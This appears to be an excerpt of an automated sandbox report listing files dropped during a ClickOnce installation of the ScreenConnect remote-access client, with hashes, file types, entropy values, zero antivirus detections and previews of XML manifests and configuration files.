                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                      MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                      SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                      SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                      SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                      MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                      SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                      SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                      SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):87
                                                                                                                                                                                                                                                      Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                      MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                      SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                      SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                      SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):3.4557019111652925
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKW0sK83yJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:/sKCxkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                      MD5:947CB7180D1041FE2D3DCDC0DAF21AD6
                                                                                                                                                                                                                                                      SHA1:82512295B5B845F5B30FE9FA784C793CEA1A4812
                                                                                                                                                                                                                                                      SHA-256:D93522FF599679EBB5BB10BAEF423E31BE8FB1437ABE86AF553EA7B93A7EDC8D
                                                                                                                                                                                                                                                      SHA-512:58D4B367A1D80B1A089C54B93318AD91C0FB8A493E3CEE659E21807FA36E57558D285D5FC8F875A298B04F207858512B63817F00ACBD1021562EE349F2AD385D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ........}.&l.'..(.................................................L#... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1590
                                                                                                                                                                                                                                                      Entropy (8bit):5.363907225770245
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                                                                                                      MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                                                                                                      SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                                                                                                      SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                                                                                                      SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
